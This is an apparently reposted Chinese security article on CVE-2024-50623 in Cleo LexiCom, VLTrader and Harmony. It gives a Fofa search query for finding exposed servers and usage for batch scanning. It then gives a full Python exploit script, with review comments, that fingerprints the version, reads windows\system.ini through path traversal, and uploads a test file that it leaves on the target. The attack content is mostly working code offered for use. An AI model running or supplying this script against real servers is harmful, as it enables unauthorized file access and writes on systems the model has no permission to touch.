Cleo LexiCom、VLTrader 和 Harmony 软件中存在不受限制的文件上传和下载漏洞。由于缺乏对上传文件和下载功能的适当验证和限制,攻击者可能利用该漏洞上传恶意文件,并可能利用系统的访问/下载功能或其他机制触发恶意文件执行。成功利用该漏洞可能导致远程代码执行,从而造成数据泄露、篡改,甚至进一步的网络攻击。
影响版本:
Cleo Harmony < 5.8.0.24
Cleo VLTrader < 5.8.0.24
Cleo LexiCom < 5.8.0.24
一、搜索引擎语句
Fofa:server="Cleo"
二、批量检测:
python poc.py -f url.txt
三、单个检测:
python poc.py -u your-ip
POC
import requests
import urllib3
from urllib.parse import urljoin
import argparse
import ssl
import re

# Both lines below turn off TLS certificate verification process-wide (every
# request further down also passes verify=False), so the script will talk to
# a host presenting any certificate and print no warning about it.
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    """Print the script banner wrapped in ANSI cyan."""
    print("\033[36m" + """
****************************************************
* CVE-2024-50623 *
* Cleo LexiCom 远程代码执行检测脚本 *
* 作者: iSee857 *
****************************************************
""" + "\033[0m")


def read_file(file_path):
    """Return the lines of ``file_path`` as a list of strings, one target per line.

    Blank lines are kept as empty strings; nothing is stripped or validated,
    so whatever is in the file is handed straight to ``check``.
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls


def version_to_tuple(version_str):
    """Convert a dotted version string such as "5.8.0.24" into a tuple of ints
    so that versions compare numerically rather than as text.

    Raises ValueError if any dotted component is not an integer (e.g. an
    empty string or a suffix like "5.8.0.24a").
    """
    return tuple(map(int, version_str.split('.')))


def check(url):
    """Fingerprint ``url`` and, if it reports a Cleo product older than
    5.8.0.24, exercise the /Synchronization endpoint to confirm CVE-2024-50623.

    NOTE(review): this is an active check, not a passive version probe. On a
    host it judges vulnerable it retrieves a file from the server, then
    uploads ``test.txt`` with the body "112233" and reads it back; nothing in
    this function deletes that file afterwards. Every request is a GET or
    POST to ``/Synchronization`` carrying a ``VLSync`` header, which is the
    pattern a defender would look for in web-server or proxy logs when
    checking whether a Cleo host has been probed.

    The return value (True / False / None depending on the branch reached)
    is not a clean "vulnerable" flag — see the notes on the individual
    returns — and the caller in ``__main__`` ignores it.

    Indentation was recovered from a collapsed listing; the nesting of the
    trailing ``else`` / ``return`` statements is the most plausible reading.
    """
    protocols = ['http://', 'https://']
    found_vulnerabilities = False  # assigned but never read
    for protocol in protocols:
        # NOTE(review): str.lstrip strips a *set* of characters, not a prefix.
        # A hostname that itself begins with one of h, t, p, s, ':' or '/'
        # loses those leading characters here, so such targets are silently
        # checked under the wrong name and reported as errors or clean.
        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
        print(f"Checking CVE-2024-50623")
        target_url=target_url.rstrip("/")
        target_endUrl = urljoin(target_url, "/Synchronization")
        headers_version = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
        }
        try:
            # Fingerprint: a plain GET to /Synchronization. The script keys on a
            # 500 response whose Server header names a Cleo product; any other
            # status is ignored and the next protocol is tried.
            response = requests.get(target_endUrl, verify=False, headers=headers_version, timeout=15)
            if response.status_code == 500:
                server_header = response.headers.get('Server', '')
                print(f"Server: {server_header}")
                # Extract the product name and version number from the Server header.
                match = re.search(r'Cleo (\w+)/([\d.]+)', server_header)
                if match:
                    lexicom = match.group(1)
                    version_str = match.group(2).strip()
                    print(f"\033[32m版本产品名: {lexicom}\033[0m")
                    print(f"\033[32m版本号: {version_str}\033[0m")
                    # Version comparison against the fixed release 5.8.0.24.
                    # A malformed version makes version_to_tuple raise
                    # ValueError, which the broad except below swallows as an
                    # "Error checking" line rather than a verdict.
                    version_tuple = version_to_tuple(version_str)
                    target_version_tuple = version_to_tuple("5.8.0.24")
                    if version_tuple < target_version_tuple:
                        print(f"\033[31m{target_url}->>>{version_str} 版本可能存在漏洞\033[0m")
                    else:
                        # Patched version: stop without sending anything further.
                        print(f"\033[32m{target_url}->>>{version_str} 版本不存在漏洞\033[0m")
                        return False
                    # Step 1 — file retrieval: a VLSync "Retrieve" header whose
                    # path traverses to windows\system.ini. The response body is
                    # matched against strings expected in that file, so this
                    # only ever confirms on a Windows host.
                    headers_ReadAnyFile = {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                        "Cookie": "jSessionId=dk8h1dw71uq7",
                        "VLSync": f'Retrieve;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\system.ini',
                    }
                    response_readAnyFile = requests.get(target_endUrl, verify=False, headers=headers_ReadAnyFile, timeout=15)
                    if response_readAnyFile.status_code == 200 and all(responsekey in response_readAnyFile.text for responsekey in ("386", "driver", "[mci]","; for")):
                        print(f"\033[31mFind:{url}:Cleo_CVE-2024-50623_ReadAnyFile!\033[0m")
                        # Step 2 — write then read back: a VLSync "ADD" POST with
                        # path=test.txt and body "112233", followed by a "Retrieve"
                        # of the same path. This leaves test.txt on the target.
                        headers_ReadAnyFileForUpload = {
                            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                            "Cookie": "jSessionId=dk8h1dw71uq7",
                            "VLSync": f'Retrieve;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=1337;po=5080;s=True;b=False;pp=1337;path=test.txt'
                        }
                        headers_upload = {
                            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                            "VLSync": f'ADD;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=192.168.1.100;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=test.txt'
                        }
                        payload_upload = "112233"
                        response_upload = requests.post(target_endUrl, verify=False, headers=headers_upload, data=payload_upload, timeout=15)
                        if response_upload.status_code == 200:
                            response_readUploadedFile = requests.get(target_endUrl, verify=False, headers=headers_ReadAnyFileForUpload, timeout=15)
                            # NOTE(review): ("112233") is a str, not a 1-tuple, so
                            # all() iterates its characters — any 200 response
                            # containing the digits 1, 2 and 3 somewhere passes.
                            # The check is weaker than it reads.
                            if response_readUploadedFile.status_code == 200 and all(responsekey in response_readUploadedFile.text for responsekey in ("112233")):
                                print(f"\033[31mFind:{url}:Cleo_CVE-2024-50623_upload!\033[0m")
                                return True
                else:
                    # Server header did not match "Cleo <product>/<version>".
                    # NOTE(review): returning True here does not mean the host
                    # is vulnerable; it only ends the protocol loop — confirm
                    # the intended meaning before relying on the return value.
                    print(f"\033[31m{target_url}:未找到产品名和版本号相关信息\033[0m")
                    return True
        except Exception as e:
            # Connection errors, timeouts and the ValueError from
            # version_to_tuple all land here and are printed, not re-raised.
            print(f"Error checking {target_endUrl}: {e}")


if __name__ == "__main__":
    banner()
    # -u takes a single host/URL; -f takes a file with one target per line.
    # The two are exclusive in practice: -u wins when both are given.
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        # Neither option given; prints "help" rather than the argparse usage text.
        print("help")
原文始发于微信公众号(Web安全工具库):Cleo 远程代码执行漏洞复现(CVE-2024-50623)(附脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。